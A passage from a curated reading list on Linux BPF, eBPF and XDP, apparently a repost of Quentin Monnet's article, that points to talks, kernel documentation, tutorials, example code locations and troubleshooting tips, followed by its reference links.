- -* [The BSD Packet Filter][54] (Suchakra Sharma, June 2017):  - A very nice introduction, mostly about the tracing aspects. - -* [_BPF: tracing and more_][55]  (Brendan Gregg, January 2017): - Mostly about the tracing use cases. - -* [_Linux BPF Superpowers_][56]  (Brendan Gregg, March 2016): - With a first part on the use of **flame graphs**. - -* [_IO Visor_][57]  (Brenden Blanco, SCaLE 14x, January 2016): - Also introduces **IO Visor project**. - -* [_eBPF on the Mainframe_][58]  (Michael Holzheu, LinuxCon, Dubin, October 2015) - -* [_New (and Exciting!) Developments in Linux Tracing_][59]  (Elena Zannoni, LinuxCon, Japan, 2015) - -* [_BPF — in-kernel virtual machine_][60]  (Alexei Starovoitov, February 2015): - Presentation by the author of eBPF. - -* [_Extending extended BPF_][61]  (Jonathan Corbet, July 2014) - -**BPF internals**: - -* Daniel Borkmann has been doing an amazing work to present **the internals** of eBPF, in particular about **its use with tc**, through several talks and papers. - * [_Advanced programmability and recent updates with tc’s cls_bpf_][30]  (netdev 1.2, Tokyo, October 2016): - Daniel provides details on eBPF, its use for tunneling and encapsulation, direct packet access, and other features. - - * [_cls_bpf/eBPF updates since netdev 1.1_][31]  (netdev 1.2, Tokyo, October 2016, part of [this tc workshop][32]) - - * [_On getting tc classifier fully programmable with cls_bpf_][33]  (netdev 1.1, Sevilla, February 2016): - After introducing eBPF, this presentation provides insights on many internal BPF mechanisms (map management, tail calls, verifier). A must-read! For the most ambitious, [the full paper is available here][34]. - - * [_Linux tc and eBPF_][35]  (fosdem16, Brussels, Belgium, January 2016) - - * [_eBPF and XDP walkthrough and recent updates_][36]  (fosdem17, Brussels, Belgium, February 2017) - - These presentations are probably one of the best sources of documentation to understand the design and implementation of internal mechanisms of eBPF. - -The [**IO Visor blog**][157] has some interesting technical articles about BPF. Some of them contain a bit of marketing talks. - -**Kernel tracing**: summing up all existing methods, including BPF: - -* [_Meet-cute between eBPF and Kerne Tracing_][62]  (Viller Hsiao, July 2016): - Kprobes, uprobes, ftrace - -* [_Linux Kernel Tracing_][63]  (Viller Hsiao, July 2016): - Systemtap, Kernelshark, trace-cmd, LTTng, perf-tool, ftrace, hist-trigger, perf, function tracer, tracepoint, kprobe/uprobe… - -Regarding **event tracing and monitoring**, Brendan Gregg uses eBPF a lot and does an excellent job at documenting some of his use cases. If you are in kernel tracing, you should see his blog articles related to eBPF or to flame graphs. Most of it are accessible [from this article][158] or by browsing his blog. - -Introducing BPF, but also presenting **generic concepts of Linux networking**: - -* [_Linux Networking Explained_][64]  (Thomas Graf, LinuxCon, Toronto, August 2016) - -* [_Kernel Networking Walkthrough_][65]  (Thomas Graf, LinuxCon, Seattle, August 2015) - -**Hardware offload**: - -* eBPF with tc or XDP supports hardware offload, starting with Linux kernel version 4.9 and introduced by Netronome. Here is a presentation about this feature: - [eBPF/XDP hardware offload to SmartNICs][147] (Jakub Kicinski and Nic Viljoen, netdev 1.2, Tokyo, October 2016) - -About **cBPF**: - -* [_The BSD Packet Filter: A New Architecture for User-level Packet Capture_][66]  (Steven McCanne and Van Jacobson, 1992): - The original paper about (classic) BPF. - -* [The FreeBSD manual page about BPF][67] is a useful resource to understand cBPF programs. - -* Daniel Borkmann realized at least two presentations on cBPF, [one in 2013 on mmap, BPF and Netsniff-NG][68], and [a very complete one in 2014 on tc and cls_bpf][69]. - -* On Cloudflare’s blog, Marek Majkowski presented his [use of BPF bytecode with the `xt_bpf`module for **iptables**][70]. It is worth mentioning that eBPF is also supported by this module, starting with Linux kernel 4.10 (I do not know of any talk or article about this, though). - -* [Libpcap filters syntax][71] - -### About XDP - -* [XDP overview][72] on the IO Visor website. - -* [_eXpress Data Path (XDP)_][73]  (Tom Herbert, Alexei Starovoitov, March 2016): - The first presentation about XDP. - -* [_BoF - What Can BPF Do For You?_][74]  (Brenden Blanco, LinuxCon, Toronto, August 2016). - -* [_eXpress Data Path_][148]  (Brenden Blanco, Linux Meetup at Santa Clara, July 2016): - Contains some (somewhat marketing?) **benchmark results**! With a single core: - * ip routing drop: ~3.6 million packets per second (Mpps) - - * tc (with clsact qdisc) drop using BPF: ~4.2 Mpps - - * XDP drop using BPF: 20 Mpps (<10 % CPU utilization) - - * XDP forward (on port on which the packet was received) with rewrite: 10 Mpps - - (Tests performed with the mlx4 driver). - -* Jesper Dangaard Brouer has several excellent sets of slides, that are essential to fully understand the internals of XDP. - * [_XDP − eXpress Data Path, Intro and future use-cases_][37]  (September 2016): - _“Linux Kernel’s fight against DPDK”_ . **Future plans** (as of this writing) for XDP and comparison with DPDK. - - * [_Network Performance Workshop_][38]  (netdev 1.2, Tokyo, October 2016): - Additional hints about XDP internals and expected evolution. - - * [_XDP – eXpress Data Path, Used for DDoS protection_][39]  (OpenSourceDays, March 2017): - Contains details and use cases about XDP, with **benchmark results**, and **code snippets** for **benchmarking** as well as for **basic DDoS protection** with eBPF/XDP (based on an IP blacklisting scheme). - - * [_Memory vs. Networking, Provoking and fixing memory bottlenecks_][40]  (LSF Memory Management Summit, March 2017): - Provides a lot of details about current **memory issues** faced by XDP developers. Do not start with this one, but if you already know XDP and want to see how it really works on the page allocation side, this is a very helpful resource. - - * [_XDP for the Rest of Us_][41]  (netdev 2.1, Montreal, April 2017), with Andy Gospodarek: - How to get started with eBPF and XDP for normal humans. This presentation was also summarized by Julia Evans on [her blog][42]. - - (Jesper also created and tries to extend some documentation about eBPF and XDP, see [related section][75].) - -* [_XDP workshop — Introduction, experience, and future development_][76]  (Tom Herbert, netdev 1.2, Tokyo, October 2016) — as of this writing, only the video is available, I don’t know if the slides will be added. - -* [_High Speed Packet Filtering on Linux_][149]  (Gilberto Bertin, DEF CON 25, Las Vegas, July 2017) — an excellent introduction to state-of-the-art packet filtering on Linux, oriented towards DDoS protection, talking about packet processing in the kernel, kernel bypass, XDP and eBPF. - -### About other components related or based on eBPF - -* [_P4 on the Edge_][77]  (John Fastabend, May 2016): - Presents the use of **P4**, a description language for packet processing, with BPF to create high-performance programmable switches. - -* If you like audio presentations, there is an associated [OvS Orbit episode (#11), called  _**P4** on the Edge_][78] , dating from August 2016\. OvS Orbit are interviews realized by Ben Pfaff, who is one of the core maintainers of Open vSwitch. In this case, John Fastabend is interviewed. - -* [_P4, EBPF and Linux TC Offload_][79]  (Dinan Gunawardena and Jakub Kicinski, August 2016): - Another presentation on **P4**, with some elements related to eBPF hardware offload on Netronome’s **NFP** (Network Flow Processor) architecture. - -* **Cilium** is a technology initiated by Cisco and relying on BPF and XDP to provide “fast in-kernel networking and security policy enforcement for containers based on eBPF programs generated on the fly”. [The code of this project][150] is available on GitHub. Thomas Graf has been performing a number of presentations of this topic: - * [_Cilium: Networking & Security for Containers with BPF & XDP_][43] , also featuring a load balancer use case (Linux Plumbers conference, Santa Fe, November 2016) - - * [_Cilium: Networking & Security for Containers with BPF & XDP_][44]  (Docker Distributed Systems Summit, October 2016 — [video][45]) - - * [_Cilium: Fast IPv6 container Networking with BPF and XDP_][46]  (LinuxCon, Toronto, August 2016) - - * [_Cilium: BPF & XDP for containers_][47]  (fosdem17, Brussels, Belgium, February 2017) - - A good deal of contents is repeated between the different presentations; if in doubt, just pick the most recent one. Daniel Borkmann has also written [a generic introduction to Cilium][80] as a guest author on Google Open Source blog. - -* There are also podcasts about **Cilium**: an [OvS Orbit episode (#4)][81], in which Ben Pfaff interviews Thomas Graf (May 2016), and [another podcast by Ivan Pepelnjak][82], still with Thomas Graf about eBPF, P4, XDP and Cilium (October 2016). - -* **Open vSwitch** (OvS), and its related project **Open Virtual Network** (OVN, an open source network virtualization solution) are considering to use eBPF at various level, with several proof-of-concept prototypes already implemented: - - * [Offloading OVS Flow Processing using eBPF][48] (William (Cheng-Chun) Tu, OvS conference, San Jose, November 2016) - - * [Coupling the Flexibility of OVN with the Efficiency of IOVisor][49] (Fulvio Risso, Matteo Bertrone and Mauricio Vasquez Bernal, OvS conference, San Jose, November 2016) - - These use cases for eBPF seem to be only at the stage of proposals (nothing merge to OvS main branch) as far as I know, but it will be very interesting to see what comes out of it. - -* XDP is envisioned to be of great help for protection against Distributed Denial-of-Service (DDoS) attacks. More and more presentations focus on this. For example, the talks from people from Cloudflare ( [_XDP in practice: integrating XDP in our DDoS mitigation pipeline_][83] ) or from Facebook ( [_Droplet: DDoS countermeasures powered by BPF + XDP_][84] ) at the netdev 2.1 conference in Montreal, Canada, in April 2017, present such use cases. - -* [_CETH for XDP_][85]  (Yan Chan and Yunsong Lu, Linux Meetup, Santa Clara, July 2016): - **CETH** stands for Common Ethernet Driver Framework for faster network I/O, a technology initiated by Mellanox. - -* [**The VALE switch**][86], another virtual switch that can be used in conjunction with the netmap framework, has [a BPF extension module][87]. - -* **Suricata**, an open source intrusion detection system, [seems to rely on eBPF components][88] for its “capture bypass” features: - [_The adventures of a Suricate in eBPF land_][89]  (Éric Leblond, netdev 1.2, Tokyo, October 2016) - [_eBPF and XDP seen from the eyes of a meerkat_][90]  (Éric Leblond, Kernel Recipes, Paris, September 2017) - -* [InKeV: In-Kernel Distributed Network Virtualization for DCN][91] (Z. Ahmed, M. H. Alizai and A. A. Syed, SIGCOMM, August 2016): - **InKeV** is an eBPF-based datapath architecture for virtual networks, targeting data center networks. It was initiated by PLUMgrid, and claims to achieve better performances than OvS-based OpenStack solutions. - -* [_**gobpf** - utilizing eBPF from Go_][92]  (Michael Schubert, fosdem17, Brussels, Belgium, February 2017): - A “library to create, load and use eBPF programs from Go” - -* [**ply**][93] is a small but flexible open source dynamic **tracer** for Linux, with some features similar to the bcc tools, but with a simpler language inspired by awk and dtrace, written by Tobias Waldekranz. - -* If you read my previous article, you might be interested in this talk I gave about [implementing the OpenState interface with eBPF][151], for stateful packet processing, at fosdem17. - -![](https://qmonnet.github.io/whirl-offload/img/icons/book.svg) - -### Documentation - -Once you managed to get a broad idea of what BPF is, you can put aside generic presentations and start diving into the documentation. Below are the most complete documents about BPF specifications and functioning. Pick the one you need and read them carefully! - -### About BPF - -* The **specification of BPF** (both classic and extended versions) can be found within the documentation of the Linux kernel, and in particular in file[linux/Documentation/networking/filter.txt][94]. The use of BPF as well as its internals are documented there. Also, this is where you can find **information about errors thrown by the verifier** when loading BPF code fails. Can be helpful to troubleshoot obscure error messages. - -* Also in the kernel tree, there is a document about **frequent Questions & Answers** on eBPF design in file [linux/Documentation/bpf/bpf_design_QA.txt][95]. - -* … But the kernel documentation is dense and not especially easy to read. If you look for a simple description of eBPF language, head for [its **summarized description**][96] on the IO Visor GitHub repository instead. - -* By the way, the IO Visor project gathered a lot of **resources about BPF**. Mostly, it is split between[the documentation directory][97] of its bcc repository, and the whole content of [the bpf-docs repository][98], both on GitHub. Note the existence of this excellent [BPF **reference guide**][99] containing a detailed description of BPF C and bcc Python helpers. - -* To hack with BPF, there are some essential **Linux manual pages**. The first one is [the `bpf(2)` man page][100] about the `bpf()` **system call**, which is used to manage BPF programs and maps from userspace. It also contains a description of BPF advanced features (program types, maps and so on). The second one is mostly addressed to people wanting to attach BPF programs to tc interface: it is [the `tc-bpf(8)` man page][101], which is a reference for **using BPF with tc**, and includes some example commands and samples of code. - -* Jesper Dangaard Brouer initiated an attempt to **update eBPF Linux documentation**, including **the different kinds of maps**. [He has a draft][102] to which contributions are welcome. Once ready, this document should be merged into the man pages and into kernel documentation. - -* The Cilium project also has an excellent [**BPF and XDP Reference Guide**][103], written by core eBPF developers, that should prove immensely useful to any eBPF developer. - -* David Miller has sent several enlightening emails about eBPF/XDP internals on the [xdp-newbies][152]mailing list. I could not find a link that gathers them at a single place, so here is a list: - * [bpf.h and you…][50] - - * [Contextually speaking…][51] - - * [BPF Verifier Overview][52] - - The last one is possibly the best existing summary about the verifier at this date. - -* Ferris Ellis started [a **blog post series about eBPF**][104]. As I write this paragraph, the first article is out, with some historical background and future expectations for eBPF. Next posts should be more technical, and look promising. - -* [A **list of BPF features per kernel version**][153] is available in bcc repository. Useful is you want to know the minimal kernel version that is required to run a given feature. I contributed and added the links to the commits that introduced each feature, so you can also easily access the commit logs from there. - -### About tc - -When using BPF for networking purposes in conjunction with tc, the Linux tool for **t**raffic **c**ontrol, one may wish to gather information about tc’s generic functioning. Here are a couple of resources about it. - -* It is difficult to find simple tutorials about **QoS on Linux**. The two links I have are long and quite dense, but if you can find the time to read it you will learn nearly everything there is to know about tc (nothing about BPF, though). There they are:  [_Traffic Control HOWTO_  (Martin A. Brown, 2006)][105], and the  [_Linux Advanced Routing & Traffic Control HOWTO_  (“LARTC”) (Bert Hubert & al., 2002)][106]. - -* **tc manual pages** may not be up-to-date on your system, since several of them have been added lately. If you cannot find the documentation for a particular queuing discipline (qdisc), class or filter, it may be worth checking the latest [manual pages for tc components][107]. - -* Some additional material can be found within the files of iproute2 package itself: the package contains [some documentation][108], including some files that helped me understand better [the functioning of **tc’s actions**][109]. - **Edit:** While still available from the Git history, these files have been deleted from iproute2 in October 2017. - -* Not exactly documentation: there was [a workshop about several tc features][110] (including filtering, BPF, tc offload, …) organized by Jamal Hadi Salim during the netdev 1.2 conference (October 2016). - -* Bonus information—If you use `tc` a lot, here are some good news: I [wrote a bash completion function][111] for this tool, and it should be shipped with package iproute2 coming with kernel version 4.6 and higher! - -### About XDP - -* Some [work-in-progress documentation (including specifications)][112] for XDP started by Jesper Dangaard Brouer, but meant to be a collaborative work. Under progress (September 2016): you should expect it to change, and maybe to be moved at some point (Jesper [called for contribution][113], if you feel like improving it). - -* The [BPF and XDP Reference Guide][114] from Cilium project… Well, the name says it all. - -### About P4 and BPF - -[P4][159] is a language used to specify the behavior of a switch. It can be compiled for a number of hardware or software targets. As you may have guessed, one of these targets is BPF… The support is only partial: some P4 features cannot be translated towards BPF, and in a similar way there are things that BPF can do but that would not be possible to express with P4\. Anyway, the documentation related to **P4 use with BPF** [used to be hidden in bcc repository][160]. This changed with P4_16 version, the p4c reference compiler including [a backend for eBPF][161]. - -![](https://qmonnet.github.io/whirl-offload/img/icons/flask.svg) - -### Tutorials - -Brendan Gregg has produced excellent **tutorials** intended for people who want to **use bcc tools** for tracing and monitoring events in the kernel. [The first tutorial about using bcc itself][162] comes with eleven steps (as of today) to understand how to use the existing tools, while [the one **intended for Python developers**][163] focuses on developing new tools, across seventeen “lessons”. - -Sasha Goldshtein also has some  [_**Linux Tracing Workshops Materials**_][164]  involving the use of several BPF tools for tracing. - -Another post by Jean-Tiare Le Bigot provides a detailed (and instructive!) example of [using perf and eBPF to setup a low-level tracer][165] for ping requests and replies - -Few tutorials exist for network-related eBPF use cases. There are some interesting documents, including an  _eBPF Offload Starting Guide_ , on the [Open NFP][166] platform operated by Netronome. Other than these, the talk from Jesper,  [_XDP for the Rest of Us_][167] , is probably one of the best ways to get started with XDP. - -![](https://qmonnet.github.io/whirl-offload/img/icons/gears.svg) - -### Examples - -It is always nice to have examples. To see how things really work. But BPF program samples are scattered across several projects, so I listed all the ones I know of. The examples do not always use the same helpers (for instance, tc and bcc both have their own set of helpers to make it easier to write BPF programs in C language). - -### From the kernel - -The kernel contains examples for most types of program: filters to bind to sockets or to tc interfaces, event tracing/monitoring, and even XDP. You can find these examples under the [linux/samples/bpf/][168]directory. - -Also do not forget to have a look to the logs related to the (git) commits that introduced a particular feature, they may contain some detailed example of the feature. - -### From package iproute2 - -The iproute2 package provide several examples as well. They are obviously oriented towards network programming, since the programs are to be attached to tc ingress or egress interfaces. The examples dwell under the [iproute2/examples/bpf/][169] directory. - -### From bcc set of tools - -Many examples are [provided with bcc][170]: - -* Some are networking example programs, under the associated directory. They include socket filters, tc filters, and a XDP program. - -* The `tracing` directory include a lot of example **tracing programs**. The tutorials mentioned earlier are based on these. These programs cover a wide range of event monitoring functions, and some of them are production-oriented. Note that on certain Linux distributions (at least for Debian, Ubuntu, Fedora, Arch Linux), these programs have been [packaged][115] and can be “easily” installed by typing e.g. `# apt install bcc-tools`, but as of this writing (and except for Arch Linux), this first requires to set up IO Visor’s own package repository. - -* There are also some examples **using Lua** as a different BPF back-end (that is, BPF programs are written with Lua instead of a subset of C, allowing to use the same language for front-end and back-end), in the third directory. - -### Manual pages - -While bcc is generally the easiest way to inject and run a BPF program in the kernel, attaching programs to tc interfaces can also be performed by the `tc` tool itself. So if you intend to **use BPF with tc**, you can find some example invocations in the [`tc-bpf(8)` manual page][171]. - -![](https://qmonnet.github.io/whirl-offload/img/icons/srcfile.svg) - -### The code - -Sometimes, BPF documentation or examples are not enough, and you may have no other solution that to display the code in your favorite text editor (which should be Vim of course) and to read it. Or you may want to hack into the code so as to patch or add features to the machine. So here are a few pointers to the relevant files, finding the functions you want is up to you! - -### BPF code in the kernel - -* The file [linux/include/linux/bpf.h][116] and its counterpart [linux/include/uapi/bpf.h][117] contain **definitions** related to eBPF, to be used respectively in the kernel and to interface with userspace programs. - -* On the same pattern, files [linux/include/linux/filter.h][118] and [linux/include/uapi/filter.h][119] contain information used to **run the BPF programs**. - -* The **main pieces of code** related to BPF are under [linux/kernel/bpf/][120] directory. **The different operations permitted by the system call**, such as program loading or map management, are implemented in file `syscall.c`, while `core.c` contains the **interpreter**. The other files have self-explanatory names: `verifier.c` contains the **verifier** (no kidding), `arraymap.c` the code used to interact with **maps** of type array, and so on. - -* The **helpers**, as well as several functions related to networking (with tc, XDP…) and available to the user, are implemented in [linux/net/core/filter.c][121]. It also contains the code to migrate cBPF bytecode to eBPF (since all cBPF programs are now translated to eBPF in the kernel before being run). - -* The **JIT compilers** are under the directory of their respective architectures, such as file[linux/arch/x86/net/bpf_jit_comp.c][122] for x86. - -* You will find the code related to **the BPF components of tc** in the [linux/net/sched/][123] directory, and in particular in files `act_bpf.c` (action) and `cls_bpf.c` (filter). - -* I have not hacked with **event tracing** in BPF, so I do not really know about the hooks for such programs. There is some stuff in [linux/kernel/trace/bpf_trace.c][124]. If you are interested in this and want to know more, you may dig on the side of Brendan Gregg’s presentations or blog posts. - -* Nor have I used **seccomp-BPF**. But the code is in [linux/kernel/seccomp.c][125], and some example use cases can be found in [linux/tools/testing/selftests/seccomp/seccomp_bpf.c][126]. - -### XDP hooks code - -Once loaded into the in-kernel BPF virtual machine, **XDP** programs are hooked from userspace into the kernel network path thanks to a Netlink command. On reception, the function `dev_change_xdp_fd()` in file [linux/net/core/dev.c][172] is called and sets a XDP hook. Such hooks are located in the drivers of supported NICs. For example, the mlx4 driver used for some Mellanox hardware has hooks implemented in files under the [drivers/net/ethernet/mellanox/mlx4/][173] directory. File en_netdev.c receives Netlink commands and calls `mlx4_xdp_set()`, which in turns calls for instance `mlx4_en_process_rx_cq()` (for the RX side) implemented in file en_rx.c. - -### BPF logic in bcc - -One can find the code for the **bcc** set of tools [on the bcc GitHub repository][174]. The **Python code**, including the `BPF` class, is initiated in file [bcc/src/python/bcc/__init__.py][175]. But most of the interesting stuff—to my opinion—such as loading the BPF program into the kernel, happens [in the libbcc **C library**][176]. - -### Code to manage BPF with tc - -The code related to BPF **in tc** comes with the iproute2 package, of course. Some of it is under the[iproute2/tc/][177] directory. The files f_bpf.c and m_bpf.c (and e_bpf.c) are used respectively to handle BPF filters and actions (and tc `exec` command, whatever this may be). File q_clsact.c defines the `clsact` qdisc especially created for BPF. But **most of the BPF userspace logic** is implemented in[iproute2/lib/bpf.c][178] library, so this is probably where you should head to if you want to mess up with BPF and tc (it was moved from file iproute2/tc/tc_bpf.c, where you may find the same code in older versions of the package). - -### BPF utilities - -The kernel also ships the sources of three tools (`bpf_asm.c`, `bpf_dbg.c`, `bpf_jit_disasm.c`) related to BPF, under the [linux/tools/net/][179] or [linux/tools/bpf/][180] directory depending on your version: - -* `bpf_asm` is a minimal cBPF assembler. - -* `bpf_dbg` is a small debugger for cBPF programs. - -* `bpf_jit_disasm` is generic for both BPF flavors and could be highly useful for JIT debugging. - -* `bpftool` is a generic utility written by Jakub Kicinski, and that can be used to interact with eBPF programs and maps from userspace, for example to show, dump, pin programs, or to show, create, pin, update, delete maps. - -Read the comments at the top of the source files to get an overview of their usage. - -### Other interesting chunks - -If you are interested the use of less common languages with BPF, bcc contains [a **P4 compiler** for BPF targets][181] as well as [a **Lua front-end**][182] that can be used as alternatives to the C subset and (in the case of Lua) to the Python tools. - -### LLVM backend - -The BPF backend used by clang / LLVM for compiling C into eBPF was added to the LLVM sources in[this commit][183] (and can also be accessed on [the GitHub mirror][184]). - -### Running in userspace - -As far as I know there are at least two eBPF userspace implementations. The first one, [uBPF][185], is written in C. It contains an interpreter, a JIT compiler for x86_64 architecture, an assembler and a disassembler. - -The code of uBPF seems to have been reused to produce a [generic implementation][186], that claims to support FreeBSD kernel, FreeBSD userspace, Linux kernel, Linux userspace and MacOSX userspace. It is used for the [BPF extension module for VALE switch][187]. - -The other userspace implementation is my own work: [rbpf][188], based on uBPF, but written in Rust. The interpreter and JIT-compiler work (both under Linux, only the interpreter for MacOSX and Windows), there may be more in the future. - -### Commit logs - -As stated earlier, do not hesitate to have a look at the commit log that introduced a particular BPF feature if you want to have more information about it. You can search the logs in many places, such as on [git.kernel.org][189], [on GitHub][190], or on your local repository if you have cloned it. If you are not familiar with git, try things like `git blame ` to see what commit introduced a particular line of code, then `git show ` to have details (or search by keyword in `git log` results, but this may be tedious). See also [the list of eBPF features per kernel version][191] on bcc repository, that links to relevant commits. - -![](https://qmonnet.github.io/whirl-offload/img/icons/wand.svg) - -### Troubleshooting - -The enthusiasm about eBPF is quite recent, and so far I have not found a lot of resources intending to help with troubleshooting. So here are the few I have, augmented with my own recollection of pitfalls encountered while working with BPF. - -### Errors at compilation time - -* Make sure you have a recent enough version of the Linux kernel (see also [this document][127]). - -* If you compiled the kernel yourself: make sure you installed correctly all components, including kernel image, headers and libc. - -* When using the `bcc` shell function provided by `tc-bpf` man page (to compile C code into BPF): I once had to add includes to the header for the clang call: - - ``` - __bcc() { - clang -O2 -I "/usr/src/linux-headers-$(uname -r)/include/" \ - -I "/usr/src/linux-headers-$(uname -r)/arch/x86/include/" \ - -emit-llvm -c $1 -o - | \ - llc -march=bpf -filetype=obj -o "`basename $1 .c`.o" - } - - ``` - - (seems fixed as of today). - -* For other problems with `bcc`, do not forget to have a look at [the FAQ][128] of the tool set. - -* If you downloaded the examples from the iproute2 package in a version that does not exactly match your kernel, some errors can be triggered by the headers included in the files. The example snippets indeed assume that the same version of iproute2 package and kernel headers are installed on the system. If this is not the case, download the correct version of iproute2, or edit the path of included files in the examples to point to the headers included in iproute2 (some problems may or may not occur at runtime, depending on the features in use). - -### Errors at load and run time - -* To load a program with tc, make sure you use a tc binary coming from an iproute2 version equivalent to the kernel in use. - -* To load a program with bcc, make sure you have bcc installed on the system (just downloading the sources to run the Python script is not enough). - -* With tc, if the BPF program does not return the expected values, check that you called it in the correct fashion: filter, or action, or filter with “direct-action” mode. - -* With tc still, note that actions cannot be attached directly to qdiscs or interfaces without the use of a filter. - -* The errors thrown by the in-kernel verifier may be hard to interpret. [The kernel documentation][129]may help, so may [the reference guide][130] or, as a last resort, the source code (see above) (good luck!). For this kind of errors it is also important to keep in mind that the verifier  _does not run_  the program. If you get an error about an invalid memory access or about uninitialized data, it does not mean that these problems actually occurred (or sometimes, that they can possibly occur at all). It means that your program is written in such a way that the verifier estimates that such errors could happen, and therefore it rejects the program. - -* Note that `tc` tool has a verbose mode, and that it works well with BPF: try appending `verbose`at the end of your command line. - -* bcc also has verbose options: the `BPF` class has a `debug` argument that can take any combination of the three flags `DEBUG_LLVM_IR`, `DEBUG_BPF` and `DEBUG_PREPROCESSOR` (see details in [the source file][131]). It even embeds [some facilities to print output messages][132] for debugging the code. - -* LLVM v4.0+ [embeds a disassembler][133] for eBPF programs. So if you compile your program with clang, adding the `-g` flag for compiling enables you to later dump your program in the rather human-friendly format used by the kernel verifier. To proceed to the dump, use: - - ``` - $ llvm-objdump -S -no-show-raw-insn bpf_program.o - - ``` - -* Working with maps? You want to have a look at [bpf-map][134], a very userful tool in Go created for the Cilium project, that can be used to dump the contents of kernel eBPF maps. There also exists [a clone][135] in Rust. - -* There is an old [`bpf` tag on **StackOverflow**][136], but as of this writing it has been hardly used—ever (and there is nearly nothing related to the new eBPF version). If you are a reader from the Future though, you may want to check whether there has been more activity on this side. - -![](https://qmonnet.github.io/whirl-offload/img/icons/zoomin.svg) - -### And still more! - -* In case you would like to easily **test XDP**, there is [a Vagrant setup][137] available. You can also **test bcc**[in a Docker container][138]. - -* Wondering where the **development and activities** around BPF occur? Well, the kernel patches always end up [on the netdev mailing list][139] (related to the Linux kernel networking stack development): search for “BPF” or “XDP” keywords. Since April 2017, there is also [a mailing list specially dedicated to XDP programming][140] (both for architecture or for asking for help). Many discussions and debates also occur [on the IO Visor mailing list][141], since BPF is at the heart of the project. If you only want to keep informed from time to time, there is also an [@IOVisor Twitter account][142]. - -And come back on this blog from time to time to see if they are new articles [about BPF][192]! - - _Special thanks to Daniel Borkmann for the numerous [additional documents][154] he pointed to me so that I could complete this collection._ - --------------------------------------------------------------------------------- - -via: https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ - -作者:[Quentin Monnet ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://qmonnet.github.io/whirl-offload/about/ -[1]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-bpf -[2]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp -[3]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-other-components-related-or-based-on-ebpf -[4]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-bpf-1 -[5]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-tc -[6]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp-1 -[7]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-p4-and-bpf -[8]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-the-kernel -[9]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-package-iproute2 -[10]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#from-bcc-set-of-tools -[11]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#manual-pages -[12]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-code-in-the-kernel -[13]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#xdp-hooks-code -[14]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-logic-in-bcc -[15]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#code-to-manage-bpf-with-tc -[16]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#bpf-utilities -[17]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#other-interesting-chunks -[18]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#llvm-backend -[19]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#running-in-userspace -[20]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#commit-logs -[21]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#errors-at-compilation-time -[22]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#errors-at-load-and-run-time -[23]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#generic-presentations -[24]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#documentation -[25]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#tutorials -[26]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#examples -[27]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#the-code -[28]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#troubleshooting -[29]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#and-still-more -[30]:http://netdevconf.org/1.2/session.html?daniel-borkmann -[31]:http://netdevconf.org/1.2/slides/oct5/07_tcws_daniel_borkmann_2016_tcws.pdf -[32]:http://netdevconf.org/1.2/session.html?jamal-tc-workshop -[33]:http://www.netdevconf.org/1.1/proceedings/slides/borkmann-tc-classifier-cls-bpf.pdf -[34]:http://www.netdevconf.org/1.1/proceedings/papers/On-getting-tc-classifier-fully-programmable-with-cls-bpf.pdf -[35]:https://archive.fosdem.org/2016/schedule/event/ebpf/attachments/slides/1159/export/events/attachments/ebpf/slides/1159/ebpf.pdf -[36]:https://fosdem.org/2017/schedule/event/ebpf_xdp/ -[37]:http://people.netfilter.org/hawk/presentations/xdp2016/xdp_intro_and_use_cases_sep2016.pdf -[38]:http://netdevconf.org/1.2/session.html?jesper-performance-workshop -[39]:http://people.netfilter.org/hawk/presentations/OpenSourceDays2017/XDP_DDoS_protecting_osd2017.pdf -[40]:http://people.netfilter.org/hawk/presentations/MM-summit2017/MM-summit2017-JesperBrouer.pdf -[41]:http://netdevconf.org/2.1/session.html?gospodarek -[42]:http://jvns.ca/blog/2017/04/07/xdp-bpf-tutorial/ -[43]:http://www.slideshare.net/ThomasGraf5/clium-container-networking-with-bpf-xdp -[44]:http://www.slideshare.net/Docker/cilium-bpf-xdp-for-containers-66969823 -[45]:https://www.youtube.com/watch?v=TnJF7ht3ZYc&list=PLkA60AVN3hh8oPas3cq2VA9xB7WazcIgs -[46]:http://www.slideshare.net/ThomasGraf5/cilium-fast-ipv6-container-networking-with-bpf-and-xdp -[47]:https://fosdem.org/2017/schedule/event/cilium/ -[48]:http://openvswitch.org/support/ovscon2016/7/1120-tu.pdf 